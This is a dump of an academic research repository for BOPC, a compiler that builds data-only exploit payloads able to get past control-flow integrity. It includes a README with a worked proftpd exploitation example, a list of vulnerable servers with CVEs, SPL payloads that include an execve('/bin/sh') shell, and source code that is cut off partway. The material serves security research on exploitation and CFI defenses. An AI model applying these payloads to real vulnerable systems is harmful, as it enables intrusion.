Repository: HexHive/BOPC Branch: master Commit: dc98173b4baf Files: 44 Total size: 590.8 KB

Directory structure:
gitextract_g5a28eqg/
├── README.md
├── evaluation/
│   ├── README.md
│   ├── ghttpd
│   ├── httpd
│   ├── lt-wireshark
│   ├── nginx1
│   ├── nullhttpd
│   ├── opensshd
│   ├── orzhttpd
│   ├── proftpd
│   ├── smbclient
│   ├── sudo
│   └── wuftpd
├── payloads/
│   ├── README.md
│   ├── abloop.spl
│   ├── execve.spl
│   ├── ifelse.spl
│   ├── infloop.spl
│   ├── loop.spl
│   ├── memrd.spl
│   ├── memwr.spl
│   ├── print.spl
│   ├── regmod.spl
│   ├── regref4.spl
│   ├── regref5.spl
│   ├── regset4.spl
│   └── regset5.spl
├── setup.sh
└── source/
    ├── BOPC.py
    ├── README.md
    ├── absblk.py
    ├── calls.py
    ├── capability.py
    ├── compile.py
    ├── config.py
    ├── coreutils.py
    ├── delta.py
    ├── map.py
    ├── mark.py
    ├── optimize.py
    ├── output.py
    ├── path.py
    ├── search.py
    └── simulate.py

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================

# Block Oriented Programming Compiler (BOPC)
___
## What is BOPC

**NEW:** The talk from the CCS'18 presentation is available [here](https://www.youtube.com/watch?v=iK7jhrK5uyg).

BOPC (which stands for _BOP Compiler_) is a tool for automatically synthesizing arbitrary, Turing-complete, _Data-Only_ payloads. BOPC finds execution traces in the binary that execute the desired payload while adhering to the binary's Control Flow Graph (CFG). This implies that existing control flow hijacking defenses are not sufficient to detect this style of execution, as execution never violates Control Flow Integrity (CFI). Essentially, we can say that Block Oriented Programming is _code reuse under CFI_.

BOPC works with basic blocks (hence the name "block-oriented"). First, it finds a set of _functional_ blocks (i.e., blocks that perform useful computations).
This step is somewhat similar to finding Return Oriented Programming (ROP) gadgets. Given the functional blocks, BOPC then looks for _dispatcher_ blocks that are used to stitch the functional blocks together. Unlike ROP (where we can move from one gadget to the next without any limitation), here we cannot do that, as it would violate the CFI. Instead, BOPC finds a proper sequence of dispatcher blocks that naturally leads the execution from one functional block to the next. Unfortunately, the problem of building _Data-Only_ payloads is NP-hard. However, it turns out that in practice BOPC finds a solution in a reasonable amount of time.

For more details on how BOPC works, please refer to our [paper](./ccs18_paper.pdf) and our [slides](./ccs18_slides.pdf) from CCS'18.

To operate, BOPC requires 3 inputs:

* A target binary that has an _Arbitrary Memory Write_ (AWP) vulnerability (**hard requirement**)
* The desired payload, expressed in a high level language called SPL (which stands for _SPloit Language_)
* The so-called "_entry point_", which is the first instruction in the binary at which the payload execution should start. There can be more than one entry point, and determining one is part of the vulnerability discovery process.

The output of BOPC is a set of "what-where" memory writes that indicate how the memory should be initialized (i.e., what values to write at which memory addresses). When the execution reaches the entry point and the memory is initialized according to the output of BOPC, the target binary executes the desired payload instead of continuing its original execution.

**Disclaimer:** This is a research project coded by a single guy. It's not a product, so do **not** expect it to work perfectly under all scenarios. It works nicely for the provided test cases, but beyond that we cannot guarantee that it will work as expected.
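To make the "what-where" output described above more concrete, here is an illustrative sketch (made-up addresses and values, **not** BOPC's actual output format) of how such a set of memory writes can be represented and serialized:

```python
import struct

# Hypothetical "what-where" writes: (address, value, size-in-bytes) triples.
# When memory is initialized like this before the entry point is reached,
# the unmodified binary is steered into executing the payload.
writes = [
    (0x678fc0, 0x29203a21, 4),   # what: 4-byte value, where: 0x678fc0
    (0x66e9e0, 0x0,        8),   # what: 8-byte zero,  where: 0x66e9e0
]

def serialize(writes):
    """Pack each value little-endian, ready to be poked into memory."""
    fmt = {1: '<B', 2: '<H', 4: '<I', 8: '<Q'}
    return [(addr, struct.pack(fmt[size], value))
            for addr, value, size in writes]

for addr, data in serialize(writes):
    print('write %d bytes at %#x: %s' % (len(data), addr, data.hex()))
```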
___
## Installation

Just run `setup.sh` :)

___
## How to use BOPC

BOPC started as a hacky project, so several changes were made to adapt it to a scientific context. That is, the implementation in the [paper](./ccs18_paper.pdf) is slightly different from the actual implementation, as we omitted several implementation details from the paper. The actual implementation overview is shown below:

![alt text](./source/images/BOPC_overview.png)

### Command line arguments explained

A good place to start are the command line arguments:
```
usage: BOPC.py [-h] [-b BINARY] [-a {save,load,saveonly}] [--emit-IR] [-d]
               [-dd] [-ddd] [-dddd] [-V] [-s SOURCE] [-e ENTRY]
               [-O {none,ooo,rewrite,full}] [-f {raw,idc,gdb}] [--find-all]
               [--mapping-id ID] [--mapping MAP [MAP ...]] [--enum-mappings]
               [--abstract-blk BLKADDR] [-c OPTIONS [OPTIONS ...]]

optional arguments:
  -h, --help            show this help message and exit

General Arguments:
  -b BINARY, --binary BINARY
                        Binary file of the target application
  -a {save,load,saveonly}, --abstractions {save,load,saveonly}
                        Work with abstraction file
  --emit-IR             Dump SPL IR to a file and exit
  -d                    Set debugging level to minimum
  -dd                   Set debugging level to basic (recommended)
  -ddd                  Set debugging level to verbose (DEBUG ONLY)
  -dddd                 Set debugging level to print-everything (DEBUG ONLY)
  -V, --version         show program's version number and exit

Search Options:
  -s SOURCE, --source SOURCE
                        Source file with SPL payload
  -e ENTRY, --entry ENTRY
                        The entry point in the binary that payload starts
  -O {none,ooo,rewrite,full}, --optimizer {none,ooo,rewrite,full}
                        Use the SPL optimizer (Default: none)
  -f {raw,idc,gdb}, --format {raw,idc,gdb}
                        The format of the solution (Default: raw)
  --find-all            Find all the solutions

Application Capability:
  -c OPTIONS [OPTIONS ...], --capability OPTIONS [OPTIONS ...]
                        Measure application's capability.
                        Options (can be many)
                            all      Search for all Statements
                            regset   Search for Register Assignments
                            regmod   Search for Register Modifications
                            memrd    Search for Memory Reads
                            memwr    Search for Memory Writes
                            call     Search for Function/System Calls
                            cond     Search for Conditional Jumps
                            load     Load capabilities from file
                            save     Save capabilities to file
                            noedge   Dump statements and exit (don't calculate edges)

Debugging Options:
  --mapping-id ID       Run the Trace Searching algorithm on a given mapping ID
  --mapping MAP [MAP ...]
                        Run the Trace Searching algorithm on a given register
                        mapping
  --enum-mappings       Enumerate all possible mappings and exit
  --abstract-blk BLKADDR
                        Abstract a specific basic block and exit
```
Ok, there are a lot of options here (divided into 4 categories), as BOPC can do several things. Let's start with the **General Arguments**.

To avoid working directly with assembly, BOPC "abstracts" each basic block into a set of "actions". For more details, please check [absblk.py](./source/absblk.py). The abstraction process symbolically executes each basic block in the binary and carefully monitors its actions. It can take from a few minutes (for small binaries) to several hours (for the larger ones). Waiting that long every time you want to run BOPC does not sound like a good idea, so BOPC uses an old trick: _caching_. The abstractions depend only on the binary, not on the SPL payload or the entry point, so we only need to calculate them *once* per binary: we compute the abstractions one time, save them into a file, and load them from that file on every subsequent run. The `save` and `saveonly` options save the abstractions into a file. The only difference is that `saveonly` halts execution after it saves the abstractions, while `save` continues to search for a solution. As you can guess, the `load` option loads the abstractions from a file.
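This caching scheme can be sketched in a few lines of Python (an illustration of the idea only, not BOPC's actual code; the `.abs` suffix mirrors the abstraction-file naming used by the tool):

```python
import os
import pickle

def compute_abstractions(binary):
    # Placeholder for the expensive symbolic-execution pass over every
    # basic block (see source/absblk.py in the real tool).
    return {'binary': binary, 'blocks': {}}

def get_abstractions(binary, mode='load'):
    """Cache abstractions per binary: they do not depend on the SPL
    payload or the entry point, so computing them once is enough."""
    cache = binary + '.abs'
    if mode == 'load' and os.path.exists(cache):
        with open(cache, 'rb') as f:
            return pickle.load(f)          # cheap: reuse previous run
    abstractions = compute_abstractions(binary)   # expensive: compute once
    if mode in ('save', 'saveonly'):
        with open(cache, 'wb') as f:
            pickle.dump(abstractions, f)
    return abstractions
```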
The `--emit-IR` option is used to "dump" the IR representation of the SPL payload (this is another intermediate result that you should not worry about). BOPC provides 5 verbosity levels: no option, `-d`, `-dd`, `-ddd` and `-dddd`. I recommend using either `-dd` or `-ddd` to get a detailed progress status.

Let's get into the **Search Options**. The most important arguments here are `--source` (a file that contains the SPL payload) and `--entry` (an address inside the binary that indicates the entry point). Trace searching starts from the entry point, so this is quite important.

The optimizer (`-O` option) is a double-edged sword. On the one hand, it optimizes the SPL payload to make it more flexible, which increases the likelihood of finding a solution. On the other hand, it increases the search space (along with the execution time). The decision is up to the user, hence the optimizer is optional. The 2 possible optimizations are _out of order execution_ (the `ooo` option) and _statement rewriting_ (the `rewrite` option).

The out-of-order optimization reorders payload statements. Consider for example the following SPL payload:
```
__r0 = 13;
__r1 = 37;
```
To find a solution here, BOPC must find a functional block for the first statement (`__r0 = 13`), then a functional block for the second statement (`__r1 = 37`), and a set of dispatcher blocks to connect these two statements. However, these functional blocks may be far apart, so a dispatcher may not exist. Yet it makes no difference whether the `__r0 = 13` statement executes first or second, as it has no dependencies on the other statement. Thus, if we rewrite the payload as follows:
```
__r1 = 37;
__r0 = 13;
```
it may be possible to find another set of dispatcher blocks, hopefully a much smaller one (path `A -> B` may be much longer than path `B -> A`), and find a solution. Internally, this is a **two-step** process.
First, the optimizer **groups** independent statements together (for more details take a look [here](./source/optimize.py)) and generates an augmented SPL IR. Then, the trace search module permutes statements within each group, each time resulting in a different, yet equivalent, SPL payload. As you can guess, there can be an exponential number of permutations, so this can take forever. To alleviate that, you can adjust the `N_OUT_OF_ORDER_ATTEMPTS` configuration parameter to tell BOPC to stop after **N** permutations, instead of trying all of them.

Statement rewriting is an under-development optimization that rewrites statements that have no counterpart in the binary. For instance, if the SPL payload spawns a shell through `execve()` but the target binary does not invoke `execve()` at all, then BOPC fails, as there are no functional blocks for that statement. However, if the target binary invokes `execv()`, it may be possible to find a solution by replacing `execve()` with `execv()`. The optimizer contains a list of possible replacements and adjusts the payload accordingly.

As we already explained, the output of BOPC is a set of "what-where" memory writes. There are several ways to express the output. For instance, it can be raw lines containing the address, the value and the size of the data that should be written in memory. Or it can be a gdb/IDA script that runs directly in the debugger and modifies the memory accordingly. The last option is the best one, as you only need to run the BOPC output in the debugger. Currently, only the `gdb` format is implemented.

The **Application Capability** options are used to measure the _application's capabilities_, which gives us upper bounds on **what** payloads the target binary is capable of executing.

Finally, the **Debugging Options** assist the audit/debugging/development process. They are used to bypass parts of the BOPC work-flow. Do not use them unless you're making changes to the code.
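As an aside, the grouping-and-permutation step of the out-of-order optimizer described earlier can be sketched as follows (illustrative only; see [optimize.py](./source/optimize.py) for the real logic — only the name `N_OUT_OF_ORDER_ATTEMPTS` mirrors the actual configuration parameter):

```python
from itertools import islice, permutations, product

# Mirrors the N_OUT_OF_ORDER_ATTEMPTS configuration parameter: stop after
# this many permutations instead of exhausting an exponential space.
N_OUT_OF_ORDER_ATTEMPTS = 4

# Statement groups as the optimizer might produce them: statements inside a
# group are independent of each other, while groups must stay in order.
groups = [["__r0 = 13", "__r1 = 37"], ["write(__r0, __r1, __r2)"]]

def equivalent_payloads(groups, limit):
    """Yield up to `limit` equivalent payloads by permuting each group."""
    for order in islice(product(*(permutations(g) for g in groups)), limit):
        yield [stmt for group in order for stmt in group]

payloads = list(equivalent_payloads(groups, N_OUT_OF_ORDER_ATTEMPTS))
# Only 2 orderings exist here (2! * 1!), and both are semantically equivalent.
```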
Recall that BOPC finds a mapping between virtual and host registers, along with a mapping between SPL variables and underlying memory addresses. If a mapping does not lead to a solution, it goes back and tries another one. If you want to focus on a specific mapping (e.g., let's say that the code crashes at mapping 458), you don't have to wait for BOPC to try the first 457 mappings first. By supplying the `--mapping-id=458` option, you can skip all other mappings and focus on that one. In case you don't know the mapping number but you know the actual mapping, you can instead use the `--mapping` option: `--mapping __r0=rax __r1=rbx`.

Finally, BOPC has a lot of configuration options. You can see all of them in [config.py](./source/config.py) and adjust them according to your needs. The default values are a nice trade-off between accuracy and performance that I found during the evaluation.

## Example

Let's see now how to actually use BOPC. The first thing to do is to get the basic block abstractions. This step is optional, but I expect that you are going to run BOPC several times, so it's a good idea to get the abstractions first:
```
./source/BOPC.py -dd --binary $BINARY --abstractions saveonly
```
This calculates the abstractions and saves them into a file named `$BINARY.abs`. Don't forget to enable debugging to see the status on the screen.

Writing an SPL payload is pretty much like writing C:
```C
void payload() {
    string prog = "/bin/sh\0";
    int argv = {&prog, 0x0};

    __r0 = &prog;
    __r1 = &argv;
    __r2 = 0;

    execve(__r0, __r1, __r2);
}
```
Please take a look at the available [payloads](./payloads) to see all features of SPL. Don't expect to write crazy programs with SPL; yes, in theory you can write any program, but in practice the more complicated the SPL payload is, the more the complexity increases and the harder it gets to find a solution.
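To get a feeling for why trying every mapping can be slow (see the `--mapping-id` discussion above), note that assigning k virtual registers to n host registers alone yields n!/(n-k)! candidate register mappings, before variable-to-address mappings multiply the count further (in practice BOPC prunes most candidates). A quick, purely illustrative calculation:

```python
from itertools import permutations

# Hypothetical example: 3 SPL virtual registers, 16 x86-64 host registers.
virtual_regs = ["__r0", "__r1", "__r2"]
host_regs = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp",
             "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]

# Every ordered choice of 3 distinct host registers is a candidate mapping.
reg_mappings = list(permutations(host_regs, len(virtual_regs)))
print(len(reg_mappings))  # 16 * 15 * 14 = 3360 register mappings alone
```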
Running BOPC is as simple as the following:
```
./source/BOPC.py -dd --binary $BINARY --source $PAYLOAD --abstractions load \
                 --entry $ENTRY --format gdb
```
If everything goes well, a `*.gdb` file will be created that contains the set of memory writes to execute the desired payload.

### Pruning search space

A common problem is that there can be thousands of mappings (their number is exponential in the number of registers and variables that are used). Each mapping can take up to a minute to test (assuming out-of-order execution and other optimizations), so BOPC may run for days. However, if you know approximately where a solution could be, you can ask BOPC to quickly find (and verify) it, without trying all mappings. Let's assume that you want to execute the following SPL payload:
```C
void payload() {
    string msg = "This is my random message! :)\0";

    __r0 = 0;
    __r1 = &msg;
    __r2 = 32;

    write( __r0, __r1, __r2 );
}
```
Because we have a system call, we know the register mapping: `__r0 <-> rdi, __r1 <-> rsi, __r2 <-> rdx`. Let's assume that we're working on the `proftpd` binary, which contains the following "all-in-one" functional block:
```Assembly
.text:000000000041D0B5 loc_41D0B5:
.text:000000000041D0B5     mov     edi, cs:scoreboard_fd ; fd
.text:000000000041D0BB     mov     edx, 20h              ; n
.text:000000000041D0C0     mov     esi, offset header    ; buf
.text:000000000041D0C5     call    _write
```
The abstractions for this basic block will be the following (recall that to get the abstractions for a single basic block, you pass `--abstract-blk 0x41D0B5` on the command line).
```
[22:02:07,822] [+] Abstractions for basic block 0x41d0b5:
[22:02:07,823] [+]     regwr :
[22:02:07,823] [+]         rsp = {'writable': True, 'const': 576460752303359992L, 'type': 'concrete'}
[22:02:07,823] [+]         rdi = {'sym': {}, 'memrd': None, 'type': 'deref', 'addr': , 'deps': []}
[22:02:07,823] [+]         rsi = {'writable': True, 'const': 6787008L, 'type': 'concrete'}
[22:02:07,823] [+]         rdx = {'writable': False, 'const': 32L, 'type': 'concrete'}
[22:02:07,823] [+]     memrd : set([(>, 32)])
[22:02:07,823] [+]     memwr : set([(>, >)])
[22:02:07,823] [+]     conwr : set([(576460752303359992L, 64)])
[22:02:07,823] [+]     splmemwr : []
[22:02:07,823] [+]     call : {}
[22:02:07,823] [+]     cond : {}
[22:02:07,823] [+]     symvars : {}
[22:02:07,823] [*]
```
Here, `__r0 <-> rdi` is loaded indirectly, and the value of `__r1 <-> rsi` (which holds the `msg` variable) is `6787008`, or `0x678fc0` in hex. Then we enumerate all possible mappings with the `--enum-mappings` option. Here, there are *287* possible mappings, but there are instances where we have thousands of mappings. If we look at the output, we can quickly search for the appropriate mapping, which in our case is mapping *#89*:
```
[.... TRUNCATED FOR BREVITY ....]
[21:59:28,471] [*] Trying mapping #88:
[21:59:28,471] [*]     Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,471] [*]     Variables: msg <-> *
[21:59:28,614] [*] Trying mapping #89:
[21:59:28,614] [*]     Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,614] [*]     Variables: msg <-> 0x678fc0L
[21:59:28,762] [*] Trying mapping #90:
[21:59:28,762] [*]     Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[21:59:28,762] [*]     Variables: msg <-> *
[.... TRUNCATED FOR BREVITY ....]
[22:00:04,709] [*] Trying mapping #287:
[22:00:04,709] [*]     Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
[22:00:04,709] [*]     Variables: msg <-> *
[22:00:04,979] [+] Trace searching algorithm finished with exit code 0
```
Now that we know the actual mapping, we can tell BOPC to focus on this one.
All we have to do is to pass the `--mapping-id 89` option. We run this, and 1 minute and 51 seconds later, we get the solution:
```
#
# This file has been created by BOPC at: 29/03/2018 22:04
#
# Solution #1
# Mapping #89
#     Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx
#     Variables: msg <-> 0x678fc0L
#
# Simulated Trace: [(0, '41d0b5', '41d0b5'), (4, '41d0b5', '41d0b5'), (6, '41d0b5', '41d0b5'), (8, '41d0b5', '41d0b5'), (10, '41d0b5', '41d0b5')]
#
break *0x403740
break *0x41d0b5

# Entry point
set $pc = 0x41d0b5

# Allocation size is always bigger (it may not needed at all)
set $pool = malloc(20480)

# In case that rbp is not initialized
set $rbp = $rsp + 0x800

# Stack and frame pointers aliases
set $stack = $rsp
set $frame = $rbp

set {char[30]} (0x678fc0) = {0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x6d, 0x79, 0x20, 0x72, 0x61, 0x6e, 0x64, 0x6f, 0x6d, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x21, 0x20, 0x3a, 0x29, 0x00}
set {char[8]} (0x66e9e0) = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
```
Let's take a closer look here. The _Simulated Trace_ comment shows the path that BOPC followed. This is a list of `($pc, $src, $dst)` tuples: `$pc` is the program counter of the SPL statement, `$src` is the address of the functional block for the current SPL statement, and `$dst` is the address of the next functional block. Before it runs, the script adjusts `$rip` to point to the entry point and makes sure that the stack pointers (`$rsp`, `$rbp`) are valid. It also allocates a "variable pool" (for more details please look at [simulate.py](./source/simulate.py)), which in our case is not used. Then we have the two actual memory writes, at `0x678fc0` and at `0x66e9e0`. If you load the binary in gdb and run this script, you will see your payload being executed:
```
(gdb) break main
Breakpoint 5 at 0x4041a0
(gdb) run
Starting program: /home/ispo/BOPC/evaluation/proftpd

Breakpoint 1, 0x00000000004041a0 in main ()
(gdb) continue
Continuing.
Breakpoint 3, 0x000000000041d0b5 in pr_open_scoreboard ()
(gdb) continue
Continuing.

Breakpoint 2, 0x0000000000403740 in write@plt ()
(gdb) continue
Continuing.
This is my random message! :)

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffde60 in ?? ()
```
Note that BOPC stops after executing the desired payload (hence the crash). If you want to avoid this situation, you can use the `returnto` SPL statement to naturally transfer execution to a safe location.

### Measuring application capabilities

**NOTE:** This is a new concept that is not mentioned in the paper.

Beyond finding Data-Only payloads, BOPC provides some basic capability measurements. Although this is not directly related to Block Oriented Programming, it can provide upper bounds and strong "indications" on what types of payloads can and cannot be executed. This is very useful, as we can quickly identify types of payloads that **cannot** be executed by the target binary. To get all the application capabilities, run the following:
```
./source/BOPC.py -dd --binary $BINARY --abstractions load --capability all save
```
If you want to simply dump all functional gadgets for a specific statement, you can do it as follows:
```
./source/BOPC.py -dd --binary $BINARY --abstractions load --capability $STMT noedge
```
where `$STMT` can be one or more of `{all, regset, regmod, memrd, memwr, call, cond}`. The `noedge` option speeds things up: it skips calculating the edges in the capability graph (each node in the capability graph represents a functional block from the binary, while an edge represents the context-sensitive shortest path distance between two functional blocks).

___
## Final Notes (please read them carefully!)

* When the symbolic execution engine deals with the filesystem (i.e., it has to `open` a file), we have to provide it with a valid file. The filename is defined in `SYMBOLIC_FILENAME` in [coreutils.py](./source/coreutils.py).
* If you want to visualize things, just uncomment the code in search.py. I'm too lazy to add CLI flags to trigger it :P
* In case the addresses used by concolic execution do not work, adjust them in [simulate.py](./source/simulate.py)
* Make sure that `$rsp` is consistent in `dump()` in [simulate.py](./source/simulate.py)
* For any questions/concerns regarding the code, you can contact [ispo](https://github.com/ispoleet)

___

================================================
FILE: evaluation/README.md
================================================

# Block Oriented Programming Compiler (BOPC)
___
### Vulnerable Application Overview

| Application                 | CVE             |
|-----------------------------|-----------------|
| [ProFTPd](./proftpd)        | CVE-2006-5815   |
| [nginx](./nginx1)           | CVE-2013-2028   |
| [sudo](./sudo)              | CVE-2012-0809   |
| [orzhttpd](./orzhttpd)      | BugtraqID 41956 |
| [wuftpd](./wuftpd)          | CVE-2000-0573   |
| [nullhttpd](./nullhttpd)    | CVE-2002-1496   |
| [opensshd](./opensshd)      | CVE-2001-0144   |
| [wireshark](./lt-wireshark) | CVE-2014-2299   |
| [apache](./httpd)           | CVE-2006-3747   |
| [smbclient](./smbclient)    | CVE-2009-1886   |
___

================================================
FILE: payloads/README.md
================================================

# Block Oriented Programming Compiler (BOPC)
___
### SPL Payload Overview

| Payload                  | Description |
|--------------------------|---------------------------------------------|
| [regset4](./regset4.spl) | Initialize 4 registers with arbitrary values |
| [regref4](./regref4.spl) | Initialize 4 registers with pointers to arbitrary memory |
| [regset5](./regset5.spl) | Initialize 5 registers with arbitrary values |
| [regref5](./regref5.spl) | Initialize 5 registers with pointers to arbitrary memory |
| [regmod](./regmod.spl)   | Initialize a register with an arbitrary value and modify it |
| [memrd](./memrd.spl)     | Read from arbitrary memory |
| [memwr](./memwr.spl)     | Write to arbitrary memory |
| [print](./print.spl)     | Display a message to stdout
using write |
| [execve](./execve.spl)   | Spawn a shell through execve |
| [abloop](./abloop.spl)   | Perform an arbitrarily long bounded loop utilizing regmod |
| [infloop](./infloop.spl) | Perform an infinite loop that sets a register in its body |
| [ifelse](./ifelse.spl)   | An if-else condition based on a register comparison |
| [loop](./loop.spl)       | Conditional loop with register modification |
___

================================================
FILE: payloads/abloop.spl
================================================
//
// BOPC Evaluation
//
// Arbitrary bounded loop with register modification
//
void payload() {
    __r0 = 0;
LOOP:
    __r0 += 1;
    goto LOOP;
}

================================================
FILE: payloads/execve.spl
================================================
//
// BOPC Evaluation
//
// execve('/bin/sh') payload
//
void payload() {
    string prog = "/bin/sh\0";
    int argv = {&prog, 0x0};

    __r0 = &prog;
    __r1 = &argv;
    __r2 = 0;

    execve(__r0, __r1, __r2);

    // return ?
}

================================================
FILE: payloads/ifelse.spl
================================================
//
// BOPC Evaluation
//
// Simple if-else condition
//
void payload() {
    __r0 = 0;

    if (__r0 != 0 ) goto SKIP;
    __r1 = 1;
    goto END;
SKIP:
    __r1 = 0;
END:
    // return 0x400ca7;
    __r0 = 0;
}

================================================
FILE: payloads/infloop.spl
================================================
//
// BOPC Evaluation
//
// Infinite loop with constant assignment
//
void payload() {
    // __r0 = 1;
LOOP:
    __r1 = 0;
    goto LOOP;
}

================================================
FILE: payloads/loop.spl
================================================
//
// BOPC Evaluation
//
// Simple loop
//
void payload() {
    __r0 = 0;
LOOP:
    __r0 += 1;
    if (__r0 != 3 ) goto LOOP;
}

================================================
FILE: payloads/memrd.spl
================================================
//
// BOPC Evaluation
//
// Memory Load
//
void payload() {
    int array = {1, 2, 3, 4,
                 5};

    __r1 = &array;
    __r0 = *__r1;
}

================================================
FILE: payloads/memwr.spl
================================================
//
// BOPC Evaluation
//
// Memory Store
//
void payload() {
    int array = {1, 2, 3, 4, 5};

    __r0 = &array;
    __r1 = 0;

    *__r0 = __r1;
}

================================================
FILE: payloads/print.spl
================================================
//
// BOPC Evaluation
//
// Print an arbitrary message to stdout using write()
//
void payload() {
    string msg = "This is my random message! :)\0";

    __r0 = 0;
    __r1 = &msg;
    __r2 = 1;

    write( __r0, __r1, __r2 );

    // return 0x?? ;s
}

================================================
FILE: payloads/regmod.spl
================================================
//
// BOPC Evaluation
//
// Register modification
//
void payload() {
    __r0 = 0;
    __r0 += 1;
}

================================================
FILE: payloads/regref4.spl
================================================
//
// BOPC Evaluation
//
// Initialize 4 registers with references
//
void payload() {
    int var_a = 0x100;
    string var_b = "this is a random string";
    int var_c = {1, 2, 3, &var_a, 4, &var_b};
    int var_d = &var_c;

    __r0 = &var_a;
    __r1 = &var_b;
    __r2 = &var_c;
    __r3 = &var_d;
}

================================================
FILE: payloads/regref5.spl
================================================
//
// BOPC Evaluation
//
// Initialize 5 registers with references
//
void payload() {
    long var_a = 0x100;
    string var_b = "this is a random string\x00";
    long *var_c = {1, 2, 3, 4, &var_a, &var_b};
    long var_d = &var_c;
    long *var_e = {&var_d, &var_d, &var_d};

    __r0 = &var_a;
    __r1 = &var_b;
    __r2 = &var_c;
    __r3 = &var_d;
    __r4 = &var_e;

    // return ??
} ================================================ FILE: payloads/regset4.spl ================================================ // // BOPC Evaluation // // Initialize 4 registers // void payload() { __r0 = 0; __r1 = 1; __r2 = 2; __r3 = 3; } ================================================ FILE: payloads/regset5.spl ================================================ // // BOPC Evaluation // // Initialize 5 registers // void payload() { __r0 = 0; __r1 = 1; __r2 = 2; __r3 = 3; __r4 = 4; } ================================================ FILE: setup.sh ================================================ #!/bin/bash # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- msg() { GREEN='\033[01;32m' # bold green NC='\033[0m' # no color echo -e "${GREEN}[INFO]${NC} $1" } error() { RED='\033[01;31m' # bold red NC='\033[0m' # no color echo -e "${RED}[ERROR]${NC} $1" } # display fancy foo clear echo echo -e '\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%' echo -e '\t% %' echo -e '\t% ::::::::: :::::::: ::::::::: :::::::: %' echo -e '\t% :+: :+: :+: :+: :+: :+: :+: :+: %' echo -e '\t% +:+ +:+ +:+ +:+ +:+ +:+ +:+ %' echo -e '\t% +#++:++#+ +#+ +:+ +#++:++#+ +#+ %' echo -e '\t% +#+ +#+ +#+ +#+ +#+ +#+ %' echo -e '\t% #+# #+# #+# #+# #+# #+# #+# %' echo -e '\t% ######### ######## 
### ######## %' echo -e '\t% %' echo -e '\t% Block Oriented Programming Compiler %' echo -e '\t% %' echo -e '\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%' echo msg "BOPC Installation Guide has been started ..." # base check (we need root) if [ "$EUID" -ne 0 ]; then error "Script needs root permissions to install the required packages." msg "Please run as 'sudo $0' (you can have a look at the source, if you don't trust me)" echo exit fi # install prerequisites first apt-get install --yes python-pip apt-get install --yes graphviz libgraphviz-dev apt-get install --yes pkg-config python-tk # install pip packages pip install angr==7.8.9.26 pip install claripy==7.8.9.26 pip install matplotlib pip install simuvex # networkx must be installed after simuvex and angr, since they depend # on networkx 2.1 pip install networkx==1.11 pip install graphviz==0.8.1 pip install pygraphviz==1.3.1 msg "BOPC Installation completed ..." msg "Have a nice day :)" echo # ------------------------------------------------------------------------------------------------- ================================================ FILE: source/BOPC.py ================================================ #!/usr/bin/env python2 # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- # # BOPC.py: # # # 
This is the main module of BOPC. It configures the environment and launches the other modules. # # ------------------------------------------------------------------------------------------------- from coreutils import * import absblk as A import compile as C import optimize as O import mark as M import search as S import capability as P import argparse import textwrap import ntpath import angr import os import sys # ------------------------------------------------------------------------------------------------ # Constant Definitions # ------------------------------------------------------------------------------------------------ VERSION = 'v2.1' # current version comments = '' # Additional comments to display on startup # ------------------------------------------------------------------------------------------------- # parse_args(): This function processes the command line arguments. # # :Ret: None. # def parse_args(): # create the parser object and the groups parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter) group_g = parser.add_argument_group('General Arguments') group_s = parser.add_argument_group('Search Options') group_c = parser.add_argument_group('Application Capability') group_d = parser.add_argument_group('Debugging Options') # ------------------------------------------------------------------------- # Group for general arguments # ------------------------------------------------------------------------- group_g.add_argument( '-b', "--binary", help = "Binary file of the target application", action = 'store', dest = 'binary', required = False, # True ) group_g.add_argument( '-a', "--abstractions", help = "Work with abstraction file", choices = ['save', 'load', 'saveonly'], default = 'none', action = 'store', dest = 